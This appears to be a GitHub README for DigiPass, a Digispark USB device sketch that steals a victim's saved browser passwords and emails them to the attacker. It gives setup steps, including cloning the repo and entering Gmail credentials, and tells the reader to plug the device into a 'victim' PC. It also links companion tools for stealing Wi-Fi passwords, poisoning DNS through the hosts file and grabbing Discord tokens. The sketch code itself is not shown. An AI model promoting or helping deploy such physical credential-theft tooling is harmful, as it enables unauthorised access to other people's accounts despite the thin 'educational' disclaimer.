DigiPass
January 29, 2023 ยท View on GitHub
- DigiPass steals the victims password vault credentials, and emails them to the attacker. Plug-in, Plug-out, and watch the passwords come in the mail! ๐ค This is all done using a Digispark (Attiny85) usb device.

_ ,--()
( )-'-.------|> DigiPass [ Digispark USB ]
" `--[] < Web Browser Password Stealer
DISCLAIMER
This project must not be used for illegal purposes, and is strictly for educational purposes and for people to experiment with. The user takes full responsibility for their own actions.
Instructions
Download and install the Arduino IDE (if have not) and configure it for Digispark.
Watch Seytonic tutorial for easy installation: https://youtu.be/fGmGBa-4cYQ
Then download the script (sketch), open it in Arduino IDE, and enter your Gmail address, password, and sender email address on LINE 42.
Setup
git clone https://github.com/CharlesTheGreat77/DigiPass
cd DigiPass/
nano DigiPass.ino
Line 42: Enter your GMAIL address, and Password.

THEN, keep scrolling right and enter the address you wish to send it to. THAT'S IT!

START YOUR PHYSICAL LEECHING!
In Action
PLUG USB INTO "VICTIM" PC!!

WAIT TILL LIGHT ON USB TURNS ON (it takes about 15 seconds).
LOOK AT YOUR EMAIL!

Extra Sketches to take NOTE on by CedArctic
- Steal Saved Wifi passwords on a PC https://github.com/CedArctic/DigiSpark-Scripts/tree/master/WiFi_Profile_Mailer
- DNS Poison by changing Hosts file https://github.com/CedArctic/DigiSpark-Scripts/tree/master/DNS%20Poisoner
Trolling Sketches
- Change Wallpaper Prank https://github.com/CedArctic/DigiSpark-Scripts/tree/master/Wallpaper_Prank
- Star Wars Sound Prank https://github.com/CedArctic/DigiSpark-Scripts/tree/master/Hi_Chewy
- Rick Roll + Fake Windows Update https://github.com/CedArctic/DigiSpark-Scripts/tree/master/RickRoll_Update
- Nerdy Joke https://github.com/CedArctic/DigiSpark-Scripts/tree/master/Talker
- Mouse Trolling https://github.com/CedArctic/DigiSpark-Scripts/tree/master/Silly_Mouse
FlipperZero Based Repo
BADUSB Repo https://github.com/CharlesTheGreat77/BADUSB
Token Grabber for BADUSB
https://github.com/CharlesTheGreat77/token2Discord
Resources
Digispark (Attiny85) $4 TOPS
https://www.amazon.com/Digispark-Kickstarter-ATTINY85-Arduino-Development/dp/B01MQOPY5C

Chris Hales - PowerShell Password One-liners https://www.google.com/amp/s/chrishales.wordpress.com/2018/01/03/powershell-password-one-liners/amp/
CedArctic - DigiSpark-Scripts https://github.com/CedArctic/DigiSpark-Scripts